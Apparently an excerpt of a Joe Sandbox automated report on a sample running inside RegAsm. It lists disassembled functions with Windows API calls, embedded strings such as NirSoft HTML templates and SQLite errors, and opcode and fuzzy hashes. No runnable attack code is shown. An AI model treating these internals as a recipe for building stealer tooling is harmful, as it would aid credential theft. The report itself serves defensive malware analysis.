                                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                                • GetParent.USER32(?), ref: 00406136
                                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                • String ID: A
                                                                • API String ID: 2892645895-3554254475
                                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                • memset.MSVCRT ref: 0040DA23
                                                                • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                • String ID: caption
                                                                • API String ID: 973020956-4135340389
                                                                • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$_snwprintf$wcscpy
                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                • API String ID: 1283228442-2366825230
                                                                • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • wcschr.MSVCRT ref: 00413972
                                                                • wcscpy.MSVCRT ref: 00413982
                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                • wcscpy.MSVCRT ref: 004139D1
                                                                • wcscat.MSVCRT ref: 004139DC
                                                                • memset.MSVCRT ref: 004139B8
                                                                  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                • memset.MSVCRT ref: 00413A00
                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                • wcscat.MSVCRT ref: 00413A27
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                • String ID: \systemroot
                                                                • API String ID: 4173585201-1821301763
                                                                • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                • strchr.MSVCRT ref: 0040C140
                                                                • strchr.MSVCRT ref: 0040C151
                                                                • _strlwr.MSVCRT ref: 0040C15F
                                                                • memset.MSVCRT ref: 0040C17A
                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                • String ID: 4$h
                                                                • API String ID: 4019544885-1856150674
                                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                • String ID: 0$6
                                                                • API String ID: 4066108131-3849865405
                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 004082EF
                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • memset.MSVCRT ref: 00408362
                                                                • memset.MSVCRT ref: 00408377
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 290601579-0
                                                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: free$wcslen
                                                                • String ID:
                                                                • API String ID: 3592753638-3916222277
                                                                • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040A47B
                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                • String ID: %s (%s)$YV@
                                                                • API String ID: 3979103747-598926743
                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                • API String ID: 2780580303-317687271
                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                • String ID: Unknown Error$netmsg.dll
                                                                • API String ID: 2767993716-572158859
                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                • database is already attached, xrefs: 0042F721
                                                                • out of memory, xrefs: 0042F865
                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpymemset
                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                • API String ID: 1297977491-2001300268
                                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                • GetLastError.KERNEL32 ref: 004178FB
                                                                • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: File$ErrorLastLockSleepUnlock
                                                                • String ID:
                                                                • API String ID: 3015003838-0
                                                                • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                • String ID: strings
                                                                • API String ID: 3166385802-3030018805
                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.MSVCRT ref: 0040D8BD
                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                • memset.MSVCRT ref: 0040D906
                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                • String ID: sysdatetimepick32
                                                                • API String ID: 1028950076-4169760276
                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                • memset.MSVCRT ref: 0041BA3D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID: -journal$-wal
                                                                • API String ID: 438689982-2894717839
                                                                • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                • GetTickCount.KERNEL32 ref: 0041887D
                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                • String ID:
                                                                • API String ID: 4218492932-0
                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: memcpy$memset
                                                                • String ID: gj
                                                                • API String ID: 438689982-4203073231
                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
